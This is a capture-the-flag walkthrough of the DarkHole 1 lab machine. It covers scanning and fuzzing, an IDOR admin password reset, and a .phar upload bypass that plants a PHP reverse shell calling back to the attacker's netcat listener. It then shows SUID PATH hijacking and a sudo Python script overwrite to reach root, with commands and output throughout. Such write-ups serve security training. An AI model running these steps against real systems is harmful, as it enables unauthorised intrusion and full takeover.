Darkhole 1
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 darkhole.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-28 10:00 EST
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 10:00
Scanning darkhole.vuln (10.0.2.54) [1 port]
Completed ARP Ping Scan at 10:00, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:00
Scanning darkhole.vuln (10.0.2.54) [65535 ports]
Discovered open port 22/tcp on 10.0.2.54
Discovered open port 80/tcp on 10.0.2.54
Completed SYN Stealth Scan at 10:00, 1.49s elapsed (65535 total ports)
Nmap scan report for darkhole.vuln (10.0.2.54)
Host is up (0.000062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:7D:63:F8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap reports port 22 for ssh and 80 for http
┌──(root@ghost)-[/home/ghost]
└─# whatweb http://darkhole.vuln
http://darkhole.vuln [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.0.2.54], Title[DarkHole]
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,php-html-txt --hc=404 http://darkhole.vuln/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://darkhole.vuln/FUZZ.FUZ2Z
Total requests: 661638
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 28 L 45 W 810 Ch "index - php"
000000151: 200 55 L 213 W 2886 Ch "register - php"
000003631: 302 0 L 0 W 0 Ch "logout - php"
000000115: 200 49 L 197 W 2507 Ch "login - php"
000008737: 200 0 L 4 W 21 Ch "dashboard - php"
Inspecting the web server we found register.php
Register here
After log with our new account we will be redirect to this dashboard. Watching url we can think in some things, changing id=2 by id=1 drops this error message 'Your Not Allowed To Access another user information'. We should open burpsuite to check what's behind the requests
As we can see, when we click on Change button we intercept the request and see is expecting parameter password and the id pointing to 2, that is ours
Now pointing to id=1 and after click in Foward you will see a 'Password Has been Updated'
Trying if user id=1 was called admin and check if we changed his password
Success, if we try to upload a php file we will get 'Sorry , Allow Ex : jpg,png,gif' message. At this point we can try fuzz for available extensions to get more info, but trying .phar format will work
┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.43 1337 > r.phar
Generating reverse shell with ShellStorm
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.43] from darkhole.vuln [10.0.2.54] 55798
Linux darkhole 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
17:37:47 up 3:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
After upload phar file, set our listener and visit or curl http://darkhole.vuln/upload/r.phar we are inside as www-data
www-data@darkhole:/home/john$ ls -la
total 72
drwxrwxrwx 5 john john 4096 Dec 28 17:43 .
drwxr-xr-x 4 root root 4096 Jul 16 2021 ..
-rw------- 1 john john 1842 Dec 28 14:37 .bash_history
-rw-r--r-- 1 john john 220 Jul 16 2021 .bash_logout
-rw-r--r-- 1 john john 3771 Jul 16 2021 .bashrc
drwx------ 2 john john 4096 Jul 17 2021 .cache
drwxrwxr-x 3 john john 4096 Jul 17 2021 .local
-rw------- 1 john john 37 Jul 17 2021 .mysql_history
-rw-r--r-- 1 john john 807 Jul 16 2021 .profile
drwxrwx--- 2 john www-data 4096 Jul 17 2021 .ssh
-rwxrwx--- 1 john john 1 Jul 17 14:37 file.py
-rwxrwx--- 1 john john 8 Jul 17 2021 password
-rwsr-xr-x 1 root root 16784 Jul 17 2021 toto
-rw-rw---- 1 john john 24 Jul 17 2021 user.txt
Searching whole system to find some file to scalate from www-data to john
www-data@darkhole:/home/john$ ./toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
Drops id command output alike
www-data@darkhole:/home/john$ strings toto
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
...
We can see setuid, system and setgid interesting calls in a suid binary
www-data@darkhole:/home/john$ cd /tmp
www-data@darkhole:/tmp$ echo '/bin/bash' > id
www-data@darkhole:/tmp$ chmod +x id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
www-data@darkhole:/tmp$ cd /home/john
www-data@darkhole:/home/john$ ./toto
john@darkhole:/home/john$ cat user.txt
DarkHole{You_Can_DO_It}
And we are john user now
john@darkhole:/home/john$ cat password
root123
john@darkhole:/home/john$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on darkhole:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on darkhole:
(root) /usr/bin/python3 /home/john/file.py
john@darkhole:/home/john$
Well, time to get root
john@darkhole:/home/john$ printf "import os\nos.system('/bin/bash')\n" > file.py && sudo -u root /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# cat /root/root.txt
DarkHole{You_Are_Legend}
And we are root